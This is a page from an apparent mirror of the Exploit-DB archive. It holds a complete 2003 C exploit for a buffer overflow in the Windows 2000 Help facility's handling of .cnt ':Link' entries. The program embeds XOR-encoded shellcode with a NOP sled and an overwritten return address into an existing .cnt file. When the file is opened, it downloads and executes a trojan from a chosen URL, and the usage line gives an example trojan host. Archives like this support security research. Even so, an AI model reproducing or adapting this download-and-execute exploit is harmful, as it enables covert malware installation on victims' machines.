bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/22354.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

216 lines
No EOL
7.5 KiB
C
Raw Blame History

// source: https://www.securityfocus.com/bid/7102/info
The Microsoft Windows 2000 Help facility does not perform sufficient bounds checking on .cnt files. If a .cnt file containing an unusually long :Link URI was opened by the Windows Help facility, a buffer would be overrun, allowing the execution of arbitrary code.
/*************************************************
* s0h - Skin Of Humanity.
* http://s0h.cc
*
* Title : Win32hlp exploit for : ":LINK overflow"
* Date : Sunday, 9 March, 2003 1:00 AM
*
* -----------------------------------------------
*
* Archive : http://s0h.cc/exploit/s0h_Win32hlp.c
* Binary : http://s0h.cc/exploit/s0h_Win32hlp.exe
*
* -----------------------------------------------
* Discovered by ThreaT <threat@s0h.cc>.
* Coded by ThreaT <threat@s0h.cc>
* Hompage : http://s0h.cc/~threat/
*
* Winhlp32.exe exploit for ':LINK' overflow !
*
* -----------------------------------------------
*
* This exploit can trap a .CNT file (file with .-
* HLP files) with the arbitrary code who can dow-
* nload and execute a trojan without user ask.
*
* -----------------------------------------------
*
* Compiling : cl /nologo s0h_Win32hlp.c
* Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset]
* Eq : C:\>s0h_Win32hlp.exe http://www.chez.com/mvm/trojan.exe c:\WINNT\Help\mplayer2.cnt 4
*
* <trojan> = host to download the trojan (http:/-
* /blah.plof/trojan.exe).
*
* <CNT file> = The CNT file.
*
* [offset] = Optionnal. This one defined a numbe-
* r between 0 and 15 that can play with the retu-
* rn address. Generaly, you must used 4 if the .-
* HLP file is called by an application.
*
* -----------------------------------------------
* This exploit was tested on :
* - Windows 2000 PRO/SERVER (fr) SP0
* - Windows 2000 PRO/SERVER (fr) SP1
* - Windows 2000 PRO/SERVER (fr) SP2
*
************************************************/
#include <windows.h>
#define taille 270
#define VulnLen 650
int main (int argc, char *argv[]) {
HANDLE ExploitFile;
DWORD lpNumberOfBytesWritten, lpFileSizeHigh, FileSize;
int i,j, len, RetByte=0xE5;
char *file, *url;
unsigned char *Shellcode, *buffer,
RealGenericShellcode[] =
"\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
"\x34\x99\xAA\x84\xC0\x75\xF8"
"\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
"\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
"\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
"\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
"\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
"\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
"\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
"\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
"\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
"\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
"\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
"\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
"\x66\x49\x71\xe6\x66\x66\x66";
printf (" * ***************************************************** *\n"
" * s0h - Skin of humanity *\n"
" * http://s0h.cc/ *\n"
" * ***************************************************** *\n"
" Win32hlp exploit for : \":LINK overflow\" *\n"
" * ***************************************************** *\n"
" * Discovered by ThreaT <threat@s0h.cc>. *\n"
" * Coded by ThreaT <threat@s0h.cc> *\n"
" * Hompage : http://s0h.cc/~threat/ *\n"
" * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c *\n"
" * ***************************************************** *\n"
);
if (argc < 3)
{
printf(
" * ***************************************************** *\n"
" * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset] *\n"
" * *\n"
" * <trojan> = host to download the trojan (http:/- *\n"
" * /blah.plof/trojan.exe). *\n"
" * *\n"
" * <CNT file> = The CNT file. *\n"
" * *\n"
" * [offset] = Optionnal. This one defined a number betw- *\n"
" * een 0 and 15 that can play with the return address. - *\n"
" * Generaly, you must used 4 if the .HLP file is called *\n"
" * by an application. *\n"
" * ***************************************************** *\n"
);
ExitProcess (1);
}
if (argv[3]) RetByte = atoi (argv[3]) + 0xE0;
len = taille + strlen (argv[1]) + 2 + 4;
url = (char *) malloc (strlen (argv[1]));
strcpy (url, argv[1]);
/*
* Create the final shellcode
*/
Shellcode = (unsigned char *) malloc (len);
// encrypt the URL
for (i=0;i<strlen (argv[1]); argv[1][i++]^=0x99);
// inject the RealGenericShellcode in the shellcode buffer
for (i=0;i<taille; Shellcode[i]=RealGenericShellcode[i++]);
// append crypted URL to the shellcode buffer
for (i,j=0;i<len - 1;Shellcode[i++]=argv[1][j++]);
Shellcode[len-6]=0x99; // URL delimitation
Shellcode[len-5]=0x2E; // fuck the winhlp32.exe parser
// append the RET ADDR
// Play with this bytes if the xploit don't work
Shellcode[len-4]=0x30;
Shellcode[len-3]=RetByte;
Shellcode[len-2]=0x06;
Shellcode[len-1]=0x00;
/* Now, we make a vuln string for our exploit */
buffer = (unsigned char *) malloc (VulnLen);
memset (buffer,0,VulnLen);
lstrcpy (buffer,":Link ");
for (i=6; i < VulnLen - len; buffer[i++] = (char)0x90);
for (i,j=0; i < VulnLen; buffer[i++] = Shellcode[j++]);
/* Trap the CNT file specified with the vuln string */
ExploitFile = CreateFile (argv[2],GENERIC_READ+GENERIC_WRITE,
FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if ( ExploitFile == INVALID_HANDLE_VALUE) {
printf ("Error : cannot open cnt file '%s'\n",argv[2]);
ExitProcess (1);
}
FileSize = GetFileSize(ExploitFile, &lpFileSizeHigh);
FileSize += lpFileSizeHigh*MAXDWORD;
file = (char *)LocalAlloc (LPTR, FileSize + 2);
file[0] = 0x0d;
file[1] = 0x0a;
file += 2;
ReadFile(ExploitFile,file,FileSize,&lpNumberOfBytesWritten,NULL);
SetFilePointer (ExploitFile,0,NULL,FILE_BEGIN);
WriteFile (ExploitFile,buffer,VulnLen,&lpNumberOfBytesWritten,NULL);
file -= 2;
WriteFile (ExploitFile,file,FileSize+2,&lpNumberOfBytesWritten,NULL);
CloseHandle(ExploitFile);
printf (
" * *******************************************************\n"
" * The file is now traped and ready to download and exe- *\n"
" * cute : *\n"
" * File : %s\n"
" * At : %s\n"
" * *******************************************************\n"
,argv[2],url);
if (RetByte != 0xE5)
printf (
" * *******************************************************\n"
" * You have specified this address : 0x0006%x30 *\n"
" * The abitrary will loaded since an application. *\n"
" * *******************************************************\n"
,RetByte);
return 0;
}
Reference in a new issue View git blame Copy permalink